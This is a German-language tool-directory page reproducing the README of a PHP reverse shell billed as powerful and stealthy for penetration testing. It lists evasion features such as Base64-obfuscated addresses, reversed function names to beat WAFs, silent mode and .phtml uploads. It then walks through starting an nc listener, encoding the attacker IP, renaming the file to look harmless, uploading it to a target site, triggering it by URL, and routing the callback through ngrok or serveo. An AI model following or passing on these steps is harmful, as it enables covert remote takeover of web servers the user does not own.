Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PHP-REVERSE-SHELL — Dies ist eine leistungsstarke und unauffällige PHP-Reverse-Shell, die für ethisches Hacking und Penetrationstests entwickelt wurde. Sie stellt eine zuverlässige und leise Verbindung zu Ihrem Rechner her. | Kitploit
Tools/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Payload-GenerierungIDS/IPS-UmgehungWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsCommand and ControlLernen & BildungRed TeamingRemote-Access-Tool

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

Dies ist eine leistungsstarke und unauffällige PHP-Reverse-Shell, die für ethisches Hacking und Penetrationstests entwickelt wurde. Sie stellt eine zuverlässige und leise Verbindung zu Ihrem Rechner her.

Repository anzeigen
1vor 11 MonatenNoch nicht geprüft

PHP Reverse Shell (Leistungsstark & Unauffällig)

Dies ist eine leistungsstarke und unauffällige PHP-Reverse-Shell, die für ethisches Hacking und Penetrationstests entwickelt wurde. Sie stellt eine zuverlässige und stille Verbindung zu Ihrem Rechner her.

⚠️ Haftungsausschluss

Diese PHP-Reverse-Shell wird ausschließlich für Bildungs- und autorisierte Penetrationstests entwickelt.
Der Entwickler übernimmt keine Verantwortung für Missbrauch, Schäden oder illegale Aktivitäten, die mit dieser Reverse-Shell durchgeführt werden.
Verwenden Sie sie verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Unautorisierter Zugriff ist illegal und strafbar.

Funktionen

  • IP und Shell-Befehl sind Base64-kodiert für Tarnung

  • Funktionsnamen sind umgekehrt, um WAF und Sicherheitsfilter zu umgehen

  • Stiller Modus – keine Ausgabe zur Vermeidung von Erkennung

  • Automatische Wiederverbindung bei Verbindungsabbruch

  • Kann als Hintergrund-Daemon laufen (falls der Server dies unterstützt)

  • Funktioniert auf den meisten PHP-fähigen Servern

  • Unterstützt Tunneling-Dienste wie Ngrok, Serveo

  • Upload mit der Erweiterung .phtml, um einige Filter zu umgehen

Verwendung

1. Starten Sie einen Listener auf Ihrem Rechner

root@kitploit:~
nc -lvnp 4444

2. Kodieren Sie Ihre IP oder Ihren Hostnamen in Base64

Verwenden Sie diesen einfachen Befehl:

root@kitploit:~
echo "your_ip_or_hostname" | base64

Beispiel:

root@kitploit:~
echo "192.168.1.5" | base64

Kopieren Sie die Ausgabe und ersetzen Sie den Wert von $ip_b64 im PHP-Reverse-Shell-Skript.

3. Aktualisieren Sie Ihr PHP-Reverse-Shell-Skript:

Ändern Sie diese Zeilen mit Ihrer Base64-kodierten IP/Ihrem Hostnamen und Port:

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. Benennen Sie die Datei um und laden Sie sie hoch

Benennen Sie die Datei in etwas weniger Verdächtiges um, zum Beispiel:

  • login.phtml

  • avatar.phtml

  • update.phtml

Die Verwendung der Erweiterung .phtml hilft der Datei, auf Servern zu laufen, die .php blockieren.

Laden Sie diese Datei auf der Zielwebsite hoch, wo Datei-Uploads erlaubt sind.

5. Lösen Sie die Reverse-Shell aus

Öffnen Sie die hochgeladene Datei in einem Browser:

root@kitploit:~
http://target.com/uploads/login.phtml

Sobald geöffnet, erhält Ihr Listener eine Reverse-Shell-Verbindung.

Verwendung von Tunneling (Wenn Ihre IP nicht öffentlich ist)

Wenn Sie mobile Daten verwenden oder hinter einem Router (NAT) sind, ist Ihre IP möglicherweise nicht öffentlich. In diesem Fall kann die Reverse-Shell Ihren Rechner nicht direkt erreichen.

Um dies zu beheben, verwenden Sie TCP-Tunneling-Tools wie Ngrok oder Serveo.

Ngrok (Empfohlen)

Ngrok installieren
Führen Sie diesen Befehl aus:

root@kitploit:~
ngrok tcp 4444

Es wird ungefähr Folgendes anzeigen:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

Aktualisieren Sie Ihr PHP-Reverse-Shell-Skript:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

Starten Sie Ihren Listener:

root@kitploit:~
nc -lvnp 4444

Serveo

Führen Sie diesen Befehl aus:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

Es wird ungefähr Folgendes sagen:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

Aktualisieren Sie Ihr PHP-Reverse-Shell-Skript:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

Starten Sie Ihren Listener:

root@kitploit:~
nc -lvnp 4444

Lizenz

Dieses Projekt ist unter der GNU General Public License v3.0 lizenziert.

Tool herunterladen